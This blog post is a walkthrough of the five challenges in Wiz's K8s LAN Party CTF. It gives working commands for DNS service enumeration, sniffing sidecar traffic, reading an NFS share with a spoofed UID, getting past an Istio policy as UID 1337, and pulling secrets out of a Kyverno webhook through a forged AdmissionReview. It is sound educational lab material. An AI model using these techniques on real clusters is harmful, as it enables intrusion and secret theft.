K8s LAN Party Challenge
Introduction
I recently had the chance to try the K8s LAN Party by Wiz, the latest of their mini-CTFs released ahead of conferences. The last one was the EKS Cluster Games, which was good fun, so I was excited to try this one as well. Unfortunately, it came out whilst I was on holiday, so I didn't have a chance to do it straight away, but promptly did so on my return.
Unlike previous events, where the challenges were typically completed in series, this one had 5 distinct challenges that could be attempted in any order. Each challenge followed a different theme.
Challenge 1 - Recon
The first challenge had the following description:
DNSing with the stars
You have compromised a Kubernetes pod, and your next objective is to compromise other internal services further.
As a warmup, utilize DNS scanning to uncover hidden internal services and obtain the flag. We have preloaded your machine with dnscan to ease this process for further challenges.
All the flags in the challenge follow the same format: wiz_k8s_lan_party{*}
Clearly a nice entry challenge to get us started, and gives us the flag format for the rest of the challenges. Looks like it has something to do with DNS. My immediate thought when it comes to this is wildcard DNS, which used to be a common occurrence in clusters, allowing resolution of names such as any.any.svc.cluster.local to get a list of all services.
Like last time, we have an interactive shell in the browser. So we can try that with host any.any.svc.cluster.local and see what we get.
player@wiz-k8s-lan-party:~$ host any.any.svc.cluster.local
Host any.any.svc.cluster.local not found: 3(NXDOMAIN)
Nope, clearly no wildcard DNS. The description also mentioned a tool called dnscan, which I'm not familiar with. A quick look at its help shows it takes a subnet as input, which suggests it could be enumerating PTR records for each IP in that subnet. We just need a subnet to scan; the obvious candidates are the service CIDR range or the pod CIDR range. Let's start with the service range.
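To illustrate what that enumeration looks like for a single address: in a typical cluster, a PTR query against a service's ClusterIP returns its in-cluster DNS name. A quick sketch with a made-up IP and service name, not taken from the challenge environment:

$ host 10.100.1.2
2.1.100.10.in-addr.arpa domain name pointer some-service.some-namespace.svc.cluster.local.

dnscan presumably just does this for every address in the supplied range.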
We now need to guess what the service CIDR range is. Luckily, we can get the service IP of the API server through environment variables; I usually just assume the range is a /16, so let's see how that goes.
player@wiz-k8s-lan-party:~$ env | grep -i kube
KUBERNETES_SERVICE_PORT_HTTPS=443
KUBERNETES_SERVICE_PORT=443
KUBERNETES_PORT_443_TCP=tcp://10.100.0.1:443
KUBERNETES_PORT_443_TCP_PROTO=tcp
KUBERNETES_PORT_443_TCP_ADDR=10.100.0.1
KUBERNETES_SERVICE_HOST=10.100.0.1
KUBERNETES_PORT=tcp://10.100.0.1:443
KUBERNETES_PORT_443_TCP_PORT=443
player@wiz-k8s-lan-party:~$ dnscan -subnet 10.100.0.1/16
34952 / 65536 [----------------------------------------------->__________________________________________] 53.33% 977 p/s
10.100.136.254 getflag-service.k8s-lan-party.svc.cluster.local.
65470 / 65536 [----------------------------------------------------------------------------------------->] 99.90% 978 p/s
10.100.136.254 -> getflag-service.k8s-lan-party.svc.cluster.local.
Nice, we found a service called getflag-service. Let's see if we can get the flag from it.
player@wiz-k8s-lan-party:~$ curl getflag-service.k8s-lan-party.svc.cluster.local.
wiz_k8s_lan_party{between-thousands-of-ips-you-found-your-northen-star}
Challenge 2 - Finding Neighbours
The next challenge had the following description:
Hello?
Sometimes, it seems we are the only ones around, but we should always be on guard against invisible sidecars reporting sensitive secrets.
This seems to imply there is a sidecar container in the pod we are currently in. Sidecars are just extra containers in the same pod, and can share various namespaces with the other containers. The network namespace, for example, is always shared between containers in a pod, and other namespaces such as PID can be shared if configured in the pod specification.
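For illustration, a hypothetical pod manifest with a sidecar might look like the following (names made up, not the challenge's actual pod definition); the network namespace is shared automatically, while sharing the PID namespace is an explicit opt-in:

$ cat sidecar-example.yml
apiVersion: v1
kind: Pod
metadata:
  name: example-pod
spec:
  shareProcessNamespace: true    # optional: containers can see each other's processes
  containers:
  - name: main
    image: example/main
  - name: reporting-sidecar      # always shares the pod's network namespace with "main"
    image: example/reporter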
The "reporting sensitive secrets" part suggests the sidecar is making requests to an external service. So we can try to capture network traffic and see what we see.
player@wiz-k8s-lan-party:~$ tcpdump -i any -A -s0
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on any, link-type LINUX_SLL2 (Linux cooked v2), snapshot length 262144 bytes
[..SNIP..]
.d...b..POST / HTTP/1.1
Host: reporting-service
User-Agent: curl/7.64.0
Accept: */*
Content-Length: 63
Content-Type: application/x-www-form-urlencoded
wiz_k8s_lan_party{good-crime-comes-with-a-partner-in-a-sidecar}
[..SNIP..]
36 packets captured
36 packets received by filter
0 packets dropped by kernel
Quickly skimming the output, we find the flag in a POST request being sent to the reporting-service.
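As an aside, had the capture been noisier, writing it to a file and filtering offline would have been easier. A quick sketch of that approach:

$ tcpdump -i any -s0 -w /tmp/capture.pcap          # capture everything to a pcap file
$ tcpdump -r /tmp/capture.pcap -A | grep wiz_k8s   # read it back and grep the ASCII dump for the flag format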
Challenge 3 - Data Leakage
Making good progress, let’s move to the next one:
Exposed File Share
The targeted big corp utilizes outdated, yet cloud-supported technology for data storage in production. But oh my, this technology was introduced in an era when access control was only network-based 🤦.
Interesting, I can't guess exactly what this is referring to purely from that. Let's dig into the pod a bit and see what's going on.
player@wiz-k8s-lan-party:~$ mount
[..SNIP..]
fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com:/ on /efs type nfs4 (ro,relatime,vers=4.1,rsize=1048576,wsize=1048576,namlen=255,hard,noresvport,proto=tcp,timeo=600,retrans=2,sec=sys,clientaddr=192.168.23.121,local_lock=none,addr=192.168.124.98)
[..SNIP..]
Of particular note within the mount output, we see an NFS mount. This is a network file system that has historically been susceptible to a variety of attacks; for example, access controls are typically enforced by the client, which can lead to fun attacks. In this case, we see that it is mounted at /efs. Let's have a look within.
player@wiz-k8s-lan-party:~$ ls -lpa /efs/
total 8
drwxr-xr-x 2 root root 6144 Mar 11 11:43 ./
drwxr-xr-x 1 player player 51 Mar 15 07:24 ../
---------- 1 daemon daemon 73 Mar 11 13:52 flag.txt
player@wiz-k8s-lan-party:~$ id daemon
uid=1(daemon) gid=1(daemon) groups=1(daemon)
OK, there is the flag, but we need to be daemon (UID 1) to read it. We now need a way to access the NFS share as UID 1. Unfortunately, we aren't root within the container, so we can't trivially switch to a different UID. Luckily, there are tools for userspace NFS access, for example nfsshell, which I have used in the past. I know from previous challenges that it's common for Wiz to put the relevant tooling in the container to help out, so let's see what may already be here. We can have a guess at a few tool names using bash autocomplete:
player@wiz-k8s-lan-party:~$ nfs
nfs-cat nfs-cp nfs-ls nfsconf nfsidmap nfsiostat nfsstat
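Tab completion did the job, but the same enumeration can be done without it by listing every command on the PATH and filtering, for example:

$ compgen -c | grep -i nfs | sort -u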
nfs-ls, nfs-cp and nfs-cat seem like they could be useful; let's quickly Google them to see what they're about. A quick Google takes us to a repository which looks to be the source (libnfs), and contains some documentation on the library. The tools look to use NFS URIs of the form nfs://[<username>@]<server|ipv4|ipv6>[:<port>]/path[?arg=val[&arg=val]*]. This seems simple enough.
player@wiz-k8s-lan-party:~$ nfs-ls nfs://fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com/
Failed to mount nfs share : mount_cb: nfs_service failed
Maybe not, that doesn't look right. Skimming the documentation a bit further, one thing that pops out is that it defaults to NFS version 3; however, looking at the mount output, we need NFS version 4. We can construct what we think the URI should be using the details from the mount command.
player@wiz-k8s-lan-party:~$ nfs-ls nfs://fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com/?version=4
---------- 1 1 1 73 flag.txt
Excellent, so this tool seems to be working nicely. Let’s cat the file and move on.
player@wiz-k8s-lan-party:~$ nfs-cat nfs://fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com/flag.txt?version=4
Failed to mount nfs share : nfs_mount_async failed. Bad export path. Absolute path does not start with '/'
Failed to open nfs://fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com/flag.txt?version=4
Interesting, back to the documentation. In some of the examples under LD_PRELOAD, I notice they have two slashes at the start of the path. Maybe this tool requires that.
player@wiz-k8s-lan-party:~$ nfs-cat nfs://fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com//flag.txt?version=4
Failed to open file /flag.txt: open call failed with "NFS4: (path /) failed with NFS4ERR_ACCESS(-13)"
Failed to open nfs://fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com//flag.txt?version=4
Awesome, moving forwards. That is the error message we would expect given the file permissions. We want to aim for UID 1. Looking at the documentation, we can set the UID as an extra parameter in the URI.
player@wiz-k8s-lan-party:~$ nfs-cat nfs://fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com//flag.txt?version=4\&uid=1
Failed to open file /flag.txt: open call failed with "NFS4: (path /) failed with NFS4ERR_ACCESS(-13)"
Failed to open nfs://fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com//flag.txt?version=4&uid=1
Interesting, same error. That’s unexpected.
At this point, I spent a lot of time trying to debug this, going down various rabbit holes such as NFS delegation, before moving on for now. I later came back after solving challenges 4 and 5 and carried on trying various things, hoping to figure out what was going on. At one point, in frustration, I randomly decided to change the UID to daemon, even though the documentation states it takes an integer. Which randomly worked, and I have no idea why. If you know why, let me know.
player@wiz-k8s-lan-party:~$ nfs-cat nfs://fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com//flag.txt?version=4\&uid=daemon
wiz_k8s_lan_party{old-school-network-file-shares-infiltrated-the-cloud!}
Testing it further, it looked to work no matter what string was supplied as the UID, and also when the UID was 0. 0 makes sense… the default is the current UID according to the documentation, and I had forgotten I wasn't root. The letters, less so.
Challenge 4 - Bypassing Boundaries
Looking at challenge 4, it has the description:
The Beauty and The Ist
Apparently, new service mesh technologies hold unique appeal for ultra-elite users (root users). Don't abuse this power; use it responsibly and with caution.
This one also has a policy:
apiVersion: security.istio.io/v1beta1
kind: AuthorizationPolicy
metadata:
  name: istio-get-flag
  namespace: k8s-lan-party
spec:
  action: DENY
  selector:
    matchLabels:
      app: "{flag-pod-name}"
  rules:
  - from:
    - source:
        namespaces: ["k8s-lan-party"]
    to:
    - operation:
        methods: ["POST", "GET"]
This suggests there is an endpoint that we can request the flag from. However, the HTTP verbs to perform that request are blocked by an Istio policy. We probably need to bypass this policy to get the flag.
First things first, we need an endpoint. Whilst we know the policy, we don’t know the name of the service. However, we can use the same DNS enumeration technique as before to find the service.
root@wiz-k8s-lan-party:~# dnscan -subnet 10.100.0.1/16
[..SNIP..]
10.100.224.159 -> istio-protected-pod-service.k8s-lan-party.svc.cluster.local.
root@wiz-k8s-lan-party:~# curl istio-protected-pod-service.k8s-lan-party.svc.cluster.local
RBAC: access denied
Name's a bit on the nose, but we now have a target. Thinking about how to bypass the policy, a few thoughts cross my mind. There could be a bypass of the policy matching itself, along the lines of modifying the HTTP request so it no longer matches the rules. However, this is unlikely: if such bypasses existed, they would most likely have been found and patched through responsible disclosure rather than showing up in a CTF. Much more likely there is something within Istio itself that we can set up or spoof to bypass the policy. I did try a few of the request-mangling techniques just in case, you never know, and as expected they didn't work (a sketch of the sort of thing I mean is below).
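For example, given the policy only lists the POST and GET methods, other or malformed HTTP verbs are an obvious thing to poke at, along these lines:

$ curl -X PUT istio-protected-pod-service.k8s-lan-party.svc.cluster.local
$ curl -X FAKEVERB istio-protected-pod-service.k8s-lan-party.svc.cluster.local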
Googling around for known Istio bypasses, I get drawn to UID 1337. This is the UID used by the Istio sidecar proxy, and it has an exception in the iptables rules that Istio installs, for example -A ISTIO_OUTPUT -m owner --uid-owner 1337 -j RETURN. In other words, traffic from processes running as UID 1337 skips the proxy redirection entirely. This could mean that we can simply change our UID to 1337, and the request just works.
Looking at /etc/passwd in the container, we do see istio within there. So let's su to that user, and try the curl again.
root@wiz-k8s-lan-party:~# cat /etc/passwd | grep 1337
istio:x:1337:1337::/home/istio:/bin/sh
root@wiz-k8s-lan-party:~# su istio
$ curl istio-protected-pod-service.k8s-lan-party.svc.cluster.local; echo
wiz_k8s_lan_party{only-leet-hex0rs-can-play-both-k8s-and-linux}
Excellent, that is one I need to keep in mind for the future.
Challenge 5 - Lateral Movement
The final challenge states:
Who will guard the guardians?
Where pods are being mutated by a foreign regime, one could abuse its bureaucracy and leak sensitive information from the administrative services.
It also has its own policy:
apiVersion: kyverno.io/v1
kind: Policy
metadata:
  name: apply-flag-to-env
  namespace: sensitive-ns
spec:
  rules:
  - name: inject-env-vars
    match:
      resources:
        kinds:
        - Pod
    mutate:
      patchStrategicMerge:
        spec:
          containers:
          - name: "*"
            env:
            - name: FLAG
              value: "{flag}"
This suggests there is a Kyverno policy that injects the flag into the environment of pods created within the sensitive-ns namespace. A quick check of our permissions in that namespace suggests they are just the defaults:
player@wiz-k8s-lan-party:~$ kubectl -n sensitive-ns auth can-i --list
2024/03/18 18:42:39 Starlark failed to allocate 4GB address space: cannot allocate memory. Integer performance may suffer.
Warning: the list may be incomplete: webhook authorizer does not support user rule resolution
Resources Non-Resource URLs Resource Names Verbs
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
podsecuritypolicies.policy [] [eks.privileged] [use]
Thus it's unlikely the API server is the route to go, especially considering the nature of the other challenges. I then remembered some thoughts I had on a client engagement a while back regarding admission webhooks, and possible techniques for accessing or exfiltrating data through admission reviews, which seems like it would work here: if we submit our own AdmissionReview to Kyverno for the creation of a "new" pod in sensitive-ns, its response should include a patch that injects the flag.
We now need the endpoint for Kyverno. Luckily, Kyverno keeps to relatively sane defaults, where it's most likely going to be kyverno-svc in the kyverno namespace.
player@wiz-k8s-lan-party:~$ host kyverno-svc.kyverno.svc.cluster.local
kyverno-svc.kyverno.svc.cluster.local has address 10.100.232.19
Excellent. Next, we need the path. I couldn't remember it off the top of my head, so I spun up a quick test cluster with Kyverno and applied the same policy to make sure a mutating policy was in place. I could then query the API server for mutatingwebhookconfigurations and just pull the path from the clientConfig:
$ kubectl get mutatingwebhookconfigurations kyverno-resource-mutating-webhook-cfg -o yaml
apiVersion: admissionregistration.k8s.io/v1
kind: MutatingWebhookConfiguration
metadata:
  [..SNIP..]
  name: kyverno-resource-mutating-webhook-cfg
[..SNIP..]
    service:
      name: kyverno-svc
      namespace: kyverno
      path: /mutate/fail
      port: 443
Excellent, we now have the service and the path. Next, we need to generate an AdmissionReview request; this is the standard format sent to webhook admission controllers. I did try manually creating my own, but got frustrated and just Googled for a solution, finding that someone had made a tool for it: kube-review. I should have checked first xD
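For reference, if you want the tool locally, it can presumably be installed with a Go toolchain; the module path below is assumed from the project's GitHub repository (anderseknert/kube-review):

$ go install github.com/anderseknert/kube-review@latest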
The tool creates the AdmissionReview JSON payload from a pod specification, so let's write a dummy pod spec and then create an admission review for it.
$ cat pod.yml
apiVersion: v1
kind: Pod
metadata:
  name: testing
  namespace: sensitive-ns
spec:
  containers:
  - name: test
    image: foo
    env:
    - name: FLAG
      value: foo
$ kube-review create pod.yml
{
  "kind": "AdmissionReview",
  "apiVersion": "admission.k8s.io/v1",
  "request": {
    "uid": "64f8eebc-dbc2-4e4d-9264-acf606306ee1",
    "kind": {
      "group": "",
      "version": "v1",
      "kind": "Pod"
    },
    "resource": {
      "group": "",
      "version": "v1",
      "resource": "pods"
    },
    "requestKind": {
      "group": "",
      "version": "v1",
      "kind": "Pod"
    },
    "requestResource": {
      "group": "",
      "version": "v1",
      "resource": "pods"
    },
    "name": "testing",
    "namespace": "sensitive-ns",
    "operation": "CREATE",
    "userInfo": {
      "username": "kube-review",
      "uid": "31808dbc-108a-4722-adc3-75bfc50d8ef3"
    },
    "object": {
      "kind": "Pod",
      "apiVersion": "v1",
      "metadata": {
        "name": "testing",
        "namespace": "sensitive-ns",
        "creationTimestamp": null
      },
      "spec": {
        "containers": [
          {
            "name": "test",
            "image": "foo",
            "env": [
              {
                "name": "FLAG",
                "value": "foo"
              }
            ],
            "resources": {}
          }
        ]
      },
      "status": {}
    },
    "oldObject": null,
    "dryRun": true,
    "options": {
      "kind": "CreateOptions",
      "apiVersion": "meta.k8s.io/v1"
    }
  }
}
Now we have the review, let’s submit it to Kyverno.
player@wiz-k8s-lan-party:~$ curl -k https://kyverno-svc.kyverno.svc.cluster.local/mutate/fail -X POST --data @review -H "Content-Type: application/json" | jq
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 3085 100 1397 100 1688 51134 61786 --:--:-- --:--:-- --:--:-- 111k
{
  "kind": "AdmissionReview",
  "apiVersion": "admission.k8s.io/v1",
  "request": {
    "uid": "64f8eebc-dbc2-4e4d-9264-acf606306ee1",
    "kind": {
      "group": "",
      "version": "v1",
      "kind": "Pod"
    },
    "resource": {
      "group": "",
      "version": "v1",
      "resource": "pods"
    },
    "requestKind": {
      "group": "",
      "version": "v1",
      "kind": "Pod"
    },
    "requestResource": {
      "group": "",
      "version": "v1",
      "resource": "pods"
    },
    "name": "testing",
    "namespace": "sensitive-ns",
    "operation": "CREATE",
    "userInfo": {
      "username": "kube-review",
      "uid": "31808dbc-108a-4722-adc3-75bfc50d8ef3"
    },
    "object": {
      "kind": "Pod",
      "apiVersion": "v1",
      "metadata": {
        "name": "testing",
        "namespace": "sensitive-ns",
        "creationTimestamp": null
      },
      "spec": {
        "containers": [
          {
            "name": "test",
            "image": "foo",
            "env": [
              {
                "name": "FLAG",
                "value": "foo"
              }
            ],
            "resources": {}
          }
        ]
      },
      "status": {}
    },
    "oldObject": null,
    "dryRun": true,
    "options": {
      "kind": "CreateOptions",
      "apiVersion": "meta.k8s.io/v1"
    }
  },
  "response": {
    "uid": "64f8eebc-dbc2-4e4d-9264-acf606306ee1",
    "allowed": true,
    "patch": "W3sib3AiOiJyZXBsYWNlIiwicGF0aCI6Ii9zcGVjL2NvbnRhaW5lcnMvMC9lbnYvMC92YWx1ZSIsInZhbHVlIjoid2l6X2s4c19sYW5fcGFydHl7eW91LWFyZS1rOHMtbmV0LW1hc3Rlci13aXRoLWdyZWF0LXBvd2VyLXRvLW11dGF0ZS15b3VyLXdheS10by12aWN0b3J5fSJ9LCB7InBhdGgiOiIvbWV0YWRhdGEvYW5ub3RhdGlvbnMiLCJvcCI6ImFkZCIsInZhbHVlIjp7InBvbGljaWVzLmt5dmVybm8uaW8vbGFzdC1hcHBsaWVkLXBhdGNoZXMiOiJpbmplY3QtZW52LXZhcnMuYXBwbHktZmxhZy10by1lbnYua3l2ZXJuby5pbzogcmVwbGFjZWQgL3NwZWMvY29udGFpbmVycy8wL2Vudi8wL3ZhbHVlXG4ifX1d",
    "patchType": "JSONPatch"
  }
}
The patch in the response is the JSON patch that Kyverno has generated for this. Decoding it leads to our final flag.
player@wiz-k8s-lan-party:~$ base64 -d <<< W3sib3AiOiJyZXBsYWNlIiwicGF0aCI6Ii9zcGVjL2NvbnRhaW5lcnMvMC9lbnYvMC92YWx1ZSIsInZhbHVlIjoid2l6X2s4c19sYW5fcGFydHl7eW91LWFyZS1rOHMtbmV0LW1hc3Rlci13aXRoLWdyZWF0LXBvd2VyLXRvLW11dGF0ZS15b3VyLXdheS10by12aWN0b3J5fSJ9LCB7InBhdGgiOiIvbWV0YWRhdGEvYW5ub3RhdGlvbnMiLCJvcCI6ImFkZCIsInZhbHVlIjp7InBvbGljaWVzLmt5dmVybm8uaW8vbGFzdC1hcHBsaWVkLXBhdGNoZXMiOiJpbmplY3QtZW52LXZhcnMuYXBwbHktZmxhZy10by1lbnYua3l2ZXJuby5pbzogcmVwbGFjZWQgL3NwZWMvY29udGFpbmVycy8wL2Vudi8wL3ZhbHVlXG4ifX1d; echo
[{"op":"replace","path":"/spec/containers/0/env/0/value","value":"wiz_k8s_lan_party{you-are-k8s-net-master-with-great-power-to-mutate-your-way-to-victory}"}, {"path":"/metadata/annotations","op":"add","value":{"policies.kyverno.io/last-applied-patches":"inject-env-vars.apply-flag-to-env.kyverno.io: replaced /spec/containers/0/env/0/value\n"}}]
Conclusion
That was a fun set of challenges. I particularly enjoyed the variety of techniques required to solve them. I'm still slightly annoyed at the NFS command in challenge 3 randomly working with an invalid UID. These CTFs are becoming a regular occurrence from Wiz, so I'm pretty sure we'll see another one soon, which I'm looking forward to. Last year, I think their first was an AWS one for fwd:CloudSec, which was also good fun. This year fwd:CloudSec is in June, so maybe that's how long I have to wait for the next one.